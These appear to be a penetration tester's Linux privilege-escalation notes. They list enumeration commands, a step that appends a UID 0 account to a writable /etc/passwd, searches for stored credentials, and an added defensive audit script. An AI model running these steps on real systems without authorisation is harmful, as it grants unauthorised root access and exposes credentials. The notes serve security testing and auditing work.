Linux Privesc Notes
Quick rundown on some easy wins for Linux privesc. Use LinPEAS in tandem to maximize potential for finding interesting things.
Are components exploitable?
Basic idea here is to check whether there are any application or kernel exploits you can take advantage of.
- What is system version? Are there kernel exploits?
uname -a
cat /etc/issue
- What's installed?
dpkg --list
- note that this is every package and could take a while to go through...
Are permissions misconfigured?
Here the idea is to find something you can write to that is run from an elevated context (a cronjob, a dependency, a script), or a file permission that is exploitable via GTFOBins etc. In either case, you can often drop in a shell and get a win.
- writable files or directories?
find / -writable -type d 2>/dev/null
find / -writable -type f 2>/dev/null
- if /etc/passwd is writable, do this locally on the victim machine:
openssl passwd w00t
echo "root2:h842dpEP28MMA:0:0:root:/root:/bin/bash" >> /etc/passwd
- Check for
sudo -l
- Can do GTFObins?
- Need user password for this.
- Check for SUID
find / -perm -u=s -type f 2>/dev/null
- Is gtfobin'able?
- Check for capabilities:
/usr/sbin/getcap -r / 2>/dev/null
- Can do GTFObins?
- Check cronjobs
ls -lah /etc/cron*
- in CTFs and suchlike, something nonstandard in /etc/cron.hourly is probably a good indicator that this is the way up.
- running crons:
cat /var/log/cron.log
- Writable cron binaries/scripts?
- Check PATH
echo $PATH
- writable directory in PATH? Think of it sort of like an unquoted service path on Windows: whatever you put there gets picked up by whatever runs with that PATH.
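The checks in this section from the other side of the table: a small audit script (added here as an example, not part of the original notes) that reports a loosely writable /etc/passwd, loosely writable directories in a PATH string, and loosely writable files under cron directories, where "loosely writable" means the group or world write bit is set so someone other than the owner could edit the file.

```shell
#!/bin/sh
# Audit helpers for the permission misconfigurations listed above (added example,
# not from the original notes). "Loosely writable" = group or world write bit set.

# Return 0 if the path exists and is loosely writable, 1 otherwise. Parses the mode
# string from ls (portable across GNU and BSD); -L follows symlinks so a link such as
# /bin -> usr/bin is judged by its target rather than by its own lrwxrwxrwx mode.
loosely_writable() {
    mode=$(ls -ldL "$1" 2>/dev/null) || return 1
    case $mode in
        ?????w*|????????w*) return 0 ;;   # char 6 = group write, char 9 = other write
        *) return 1 ;;
    esac
}

# Print each directory in a PATH-style string that is loosely writable. Such a directory
# lets any local user plant a binary that shadows a command run with elevated rights.
# An empty component means the current directory.
audit_path_dirs() {
    old_ifs=$IFS
    IFS=:
    for d in $1; do
        [ -n "$d" ] || d=.
        if loosely_writable "$d"; then
            echo "WRITABLE PATH DIR: $d"
        fi
    done
    IFS=$old_ifs
}

# Print every regular file under the given cron directories that is loosely writable.
# Those files run as root on a schedule, so whoever can edit them effectively runs as root.
audit_cron_scripts() {
    for dir in "$@"; do
        [ -d "$dir" ] || continue
        find "$dir" -type f 2>/dev/null | while read -r f; do
            if loosely_writable "$f"; then
                echo "WRITABLE CRON FILE: $f"
            fi
        done
    done
}

# Walk the live system only when asked explicitly, so sourcing the file has no side effects.
if [ "${1:-}" = "run" ]; then
    if loosely_writable /etc/passwd; then
        echo "WRITABLE: /etc/passwd (a local user can append a UID 0 account)"
    fi
    audit_path_dirs "$PATH"
    audit_cron_scripts /etc/cron.d /etc/cron.hourly /etc/cron.daily /etc/cron.weekly
fi
```

Run it as `sh audit.sh run` on the host being reviewed; anything it prints is a finding to fix with chmod or chown, and an empty output covers only the write-bit cases, not SUID or capabilities.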
Is critical information exposed?
More or less, can you find creds stored in plaintext?
- Is there interesting information in files?
find / -name '*.kdbx' -type f 2>/dev/null
- replace *.kdbx with other file types that might be interesting (quote the pattern so the shell doesn't expand it first). Think about db configs, .git directories, any source code/scripts that may authenticate to something, etc.
- running processes?
ps aux
top -n 1
- Any creds in command lines? e.g. a
mysql -u root -pQwE123rfww -h 192.168.13.14
sort of situation.
- Listening network connections?
netstat -tunlp
- Check history; probably nothing, but do it anyway.
history